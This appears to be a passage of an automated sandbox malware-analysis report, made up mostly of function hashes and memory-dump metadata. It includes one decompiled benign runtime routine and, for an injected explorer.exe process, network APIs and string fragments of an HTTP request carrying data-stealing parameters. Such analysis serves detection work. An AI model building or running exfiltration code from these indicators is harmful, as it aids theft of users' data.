Opcode ID: 05ee77f1d7c1d1e1bbe5a72190a35d4279585ab0430b9cf275c9b5756d9933be
Instruction ID: f52bb6777c0b05c998493fd49a79d86499281b05b16cbee34587e6a72d3c2621
Opcode Fuzzy Hash: 05ee77f1d7c1d1e1bbe5a72190a35d4279585ab0430b9cf275c9b5756d9933be
Instruction Fuzzy Hash: 00D02E713231809AD72E6300C824BE23222F7807A0F34084CF2C70B9EAEA6A88D48208

Uniqueness

Uniqueness Score: -1.00%

Function 010116E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2cf1478fa19338410d576e789cf1f650abe18d5193b7622d0655869b6acfb2
Instruction ID: d2b6cb89635b822ce54cdc9b57bcff546efd2197e3399a6e2740390740dc7722
Opcode Fuzzy Hash: 8d2cf1478fa19338410d576e789cf1f650abe18d5193b7622d0655869b6acfb2
Instruction Fuzzy Hash: 29D0A731200202A2EA2E5B24AC14B142691FB94781F38049CF347494C1DFBACC93E04C

Uniqueness

Uniqueness Score: -1.00%

Function 010653CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 54f4a268f7b06ffecd70a0f352bf28e235b80857551660602096ffcc3f03bb18
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: A0E0EC719446849BDF12DB59CA50F5EBBF9FB84B80F154454A5885F671C668AD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FFAAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 104ba51aec92819027652f42a388b6d7fe0d2781b364adb1bc016b672f9eb4e1
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 82D0E975352980CFD657CB1DC594B1573A4BF44B44FC504E0E945CB762E62CDD44CA10

Uniqueness

Uniqueness Score: -1.00%

Function 010135A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: d075dba85ec1bbb88db7e62d23767e341103b701db8fcd05836f59114e30a6d7
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 24D0A9314011849EEB82AB14C2187ACBBB3BF00A28F5820A5D2820E86EC33E4A1AD600

Uniqueness

Uniqueness Score: -1.00%

Function 00FEDB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 410e2f3803098ab7d73e62c28712c78d5bf5ca9450410403cc2e139f97dca13b
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: D2C08C30290A41AAEB221F20CE01B4036A1BB50B01F4500A06300DA4F0EBB8DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 0106A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: fd4fcb868c7a4a8fbe4c48abf885243a28a3a6bd4f43e7b91f5e0fac999d53b0
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: FFC01232080688BBCB126E81CC00F467B2AFBA4B60F008011BA480A5A0C632E9B0EA84

Uniqueness

Uniqueness Score: -1.00%

Function 01003A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: b0ba6b8d60a45c0da10fedb81b035ddddf7f94e8f0236a0b7259fabf3b7116af
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: A8C08C32080648BBC7126E41DD00F017B29E7A4B60F000020B7040A5A0C572EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 00FEAD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 99e87521ff6328d94fffe156e0663d8aa177b68c779b5967b3666208af0518d2
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 5DC08C32080248BBC7126A45CD00F017B29E7A0BA0F000020F6480A6A2C936E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 00FF76E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: b0e063dc66b58c219ae2558735fc5b580bf6d3e25caa4bc21e287a0e000a9a10
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 4AC08C70545ACC5AEB2A6708CE20B707650BF18718F4801BCAB85894F2D36CBC02D248

Uniqueness

Uniqueness Score: -1.00%

Function 010136CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: ab2a33321f78f00134e4d29cd7feafe07ef84771863e7d236c0a7935e39da586
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 66C02B74150840FBE7165F30CE00F147294F704A31F6407A47320894F0E56C9C00D104

Uniqueness

Uniqueness Score: -1.00%

Function 01007D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 3dcc8d537ab351f164720f7ae8eca209885483aef1e84d13dfe21feb9185f5d0
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: BBB092353019408FDE57EF18C080B1533F4BB44A40F8400D0E440CBA21D229E9008900

Uniqueness

Uniqueness Score: -1.00%

Function 01012ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 07779fabfb211d0a1cde484bb93d5badeaeed673af4d4a9e0bd05062bf9814c3
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 2FB01232C10444CFCF02EF40CA10B297332FF40750F054490A20167931C22CAC11DB40

Uniqueness

Uniqueness Score: -1.00%

Function 01029950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
Instruction ID: 445434661316b5bac21f645809d51336830627cc6d982003a9ecb48d0a02f0c1
Opcode Fuzzy Hash: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
Instruction Fuzzy Hash: 879002A122140903D140659988046070109A7D0343F91C011A2454555ECA698C617275

Uniqueness

Uniqueness Score: -1.00%

Function 010299D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
Instruction ID: 19d8912fbd956ea94acd83a66d8cf87fa946021ffdbfb035dfc4fc78c2fccdc6
Opcode Fuzzy Hash: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
Instruction Fuzzy Hash: F09002A123100542D104619984047060149A7E1242F91C012A2544554CC5698C716265

Uniqueness

Uniqueness Score: -1.00%

Function 01029820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
Instruction ID: 13fff0bdcb069fef8d6b8a9808eb4ebe5d7da6ebb4d7974f9dcc40646a528cac
Opcode Fuzzy Hash: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
Instruction Fuzzy Hash: 2D90027126100902D14171998404606010DB7D0282FD1C012A0814554EC6958A66BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0102B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
Instruction ID: 2d6333bf46b0a442f38ef25943159c5b283a4a08f99eb7ac62a27797e6360de1
Opcode Fuzzy Hash: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
Instruction Fuzzy Hash: 269002A1621145434540B19988044065119B7E13423D1C121A0844560CC6A88865A3A5

Uniqueness

Uniqueness Score: -1.00%

Function 010298A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
Instruction ID: 36f380b874187825325f68b0b508708f7cdc7ecb5227265dc4c709009d7ec030
Opcode Fuzzy Hash: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
Instruction Fuzzy Hash: B690026132100902D10261998414606010DE7D1386FD1C012E1814555DC6658963B272

Uniqueness

Uniqueness Score: -1.00%

Function 01029B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
Instruction ID: de066ca831bea974e4b502f2359dd80ac8dbbf3fe7abe29be273ce9a2cb9ed43
Opcode Fuzzy Hash: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
Instruction Fuzzy Hash: 8990026126100D02D1407199C414707010AE7D0642F91C011A0414554DC656897577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0102A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
Instruction ID: fc0602712ab44ef66cd6a9bb21d708f89c8d0e17c241f9f71251da78f653e115
Opcode Fuzzy Hash: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
Instruction Fuzzy Hash: 2190027122144502D1407199C44460B5109B7E0342F91C411E0815554CC6558866A361

Uniqueness

Uniqueness Score: -1.00%

Function 01029A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
Instruction ID: 04e414bc2a472f68e78c80f94a84dbc839c1701b1bff6549e20b968d9b4f9133
Opcode Fuzzy Hash: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
Instruction Fuzzy Hash: 1790027122140902D100619988087470109A7D0343F91C011A5554555EC6A5C8A17671

Uniqueness

Uniqueness Score: -1.00%

Function 01029A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
Instruction ID: 44afaef8620daec406fb5eab3b984d2dce80aa709e56c4c1ded2a508197b5748
Opcode Fuzzy Hash: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
Instruction Fuzzy Hash: 1890026122144942D14062998804B0F4209A7E1243FD1C019A4546554CC95588656761

Uniqueness

Uniqueness Score: -1.00%

Function 01029520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
Instruction ID: bbef87c4316f879fd00348d76f9d1b8f1a5c36a0c2f6e63e3ffbc24ec158a5b7
Opcode Fuzzy Hash: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
Instruction Fuzzy Hash: 9D9002E1221145924500A299C404B0A4609A7E0242B91C016E1444560CC5658861A275

Uniqueness

Uniqueness Score: -1.00%

Function 0102AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
Instruction ID: a201254f0c99b29d1d72efd8b068178cead1a28dd3ae6cdeb2617b805cd69fd6
Opcode Fuzzy Hash: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
Instruction Fuzzy Hash: 9A900271A2500512914071998814646410AB7E0782B95C011A0904554CC9948A6563E1

Uniqueness

Uniqueness Score: -1.00%

Function 01029560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
Instruction ID: 01d690c2491289a16cefb2a75e89d65be9a500935ea5702fd1304b5c9513eb24
Opcode Fuzzy Hash: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
Instruction Fuzzy Hash: 21900265231005020145A599460450B0549B7D63923D1C015F1806590CC66188756361

Uniqueness

Uniqueness Score: -1.00%

Function 010295F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
Instruction ID: 65cbdb5b8abe911aaee432da30c98f13b03c306f08de652ad463e98c2e99572e
Opcode Fuzzy Hash: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
Instruction Fuzzy Hash: 1590027122100D02D104619988046860109A7D0342F91C011A6414655ED6A588A17271

Uniqueness

Uniqueness Score: -1.00%

Function 0102A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
Instruction ID: 3abd754c73ed82c0ecb0a3807f013ec05deaa5214c74db521d77937526971426
Opcode Fuzzy Hash: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
Instruction Fuzzy Hash: CD900271321005529500A6D99804A4A4209A7F0342B91D015A4404554CC59488716261

Uniqueness

Uniqueness Score: -1.00%

Function 01029730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
Instruction ID: a0b96b9eef6f6a6f02e59979be703768a67cd350026d8c698c080111fd05b497
Opcode Fuzzy Hash: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
Instruction Fuzzy Hash: 6B90026162500902D140719994187060119A7D0242F91D011A0414554DC6998A6577E1

Uniqueness

Uniqueness Score: -1.00%

Function 01029760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
Instruction ID: 343e2be6aa9f8bcd5cff015e85cfeb2408ff8f7409ce7c333c9f532a4dc8afd1
Opcode Fuzzy Hash: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
Instruction Fuzzy Hash: B690027122100903D100619995087070109A7D0242F91D411A0814558DD69688617261

Uniqueness

Uniqueness Score: -1.00%

Function 0102A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
Instruction ID: 9ac1a8b09035e0cc81290d581e2d974261327ce542baca8d2ff2612d245b3e60
Opcode Fuzzy Hash: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
Instruction Fuzzy Hash: 9590027522504942D50065999804A870109A7D0346F91D411A081459CDC6948871B261

Uniqueness

Uniqueness Score: -1.00%

Function 01029770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
Instruction ID: aac337c5de8b4efa4cf54b4d915773d55e78858876539a1ed8edeee03bffa42f
Opcode Fuzzy Hash: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
Instruction Fuzzy Hash: 8390026122504942D10065999408A060109A7D0246F91D011A1454595DC6758861B271

Uniqueness

Uniqueness Score: -1.00%

Function 01029FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
Instruction ID: e25ecb83a1500eccf144bfd0bc48860dd863ee1d7ff29b980610c4b52bfde9f1
Opcode Fuzzy Hash: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
Instruction Fuzzy Hash: 3690027133114902D1106199C4047060109A7D1242F91C411A0C14558DC6D588A17262

Uniqueness

Uniqueness Score: -1.00%

Function 01029610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
Instruction ID: 7dedbcbf9af5667bd211eb4a070f9042a282fb26ef9c61fce3fcff3b030be0ab
Opcode Fuzzy Hash: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
Instruction Fuzzy Hash: 0F90027162500D02D150719984147460109A7D0342F91C011A0414654DC7958A6577E1

Uniqueness

Uniqueness Score: -1.00%

Function 01029650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
Instruction ID: 32352129f9461d6858092b3a50f57e83c265fad49a09f1a75545861e4da16c90
Opcode Fuzzy Hash: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
Instruction Fuzzy Hash: E890027122504D42D14071998404A460119A7D0346F91C011A0454694DD6658D65B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 010296D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
Instruction ID: 79815e2fc6dc23ff0ff904b6267ec1a968effc08295fb863cc57ffdcbe546b37
Opcode Fuzzy Hash: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
Instruction Fuzzy Hash: FB90027122100D42D10061998404B460109A7E0342F91C016A0514654DC655C8617661

Uniqueness

Uniqueness Score: -1.00%

Function 01029670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 63320afde319bd72aea9ba72a9a890aaf3ce4b5175db8d93795c45f68dcd5e5b
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0107FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0107FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0102CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01075720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01075720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0107fdda
0x0107fde2
0x0107fde5
0x0107fdec
0x0107fdfa
0x0107fdff
0x0107fe0a
0x0107fe0f
0x0107fe17
0x0107fe1e
0x0107fe19
0x0107fe19
0x0107fe19
0x0107fe20
0x0107fe21
0x0107fe22
0x0107fe25
0x0107fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0107FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0107FE2B

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
Instruction ID: f31177dda8a7ad685a5369ec7a19e25fdb2cef152321fea1928542c7daaf626c
Opcode Fuzzy Hash: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
Instruction Fuzzy Hash: 00F0F632600602BFEA201A55DC02F67BF6AFB94B30F140315F668561D1DAA2F820D6F5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3472 Parent PID: 5772 explorer.exeCOMMON

Executed Functions

Function 06D527A2, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 06D5294F
setsockopt.WS2_32 ref: 06D53051
recv.WS2_32 ref: 06D5307A

Strings

&un=, xrefs: 06D52D12
tion, xrefs: 06D52B52
GET , xrefs: 06D52B39
: cl, xrefs: 06D52B59
&sql, xrefs: 06D52C92
dat=, xrefs: 06D52AB1
nnec, xrefs: 06D52B4B
&br=, xrefs: 06D52D2A
ose, xrefs: 06D52B60
Co, xrefs: 06D52B44

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
Instruction ID: 1f1db53d920b351cd9cfcfcc9464c54b86515736ea322c63abd7717de02c02ce
Opcode Fuzzy Hash: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
Instruction Fuzzy Hash: 1B526431618B088BCBA9EF68D4847EAB7E1FB54300F51452ED8AFC7542EE30A549CB95

Uniqueness

Uniqueness Score: -1.00%

Function 06D51A52, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 06D51C69

Strings

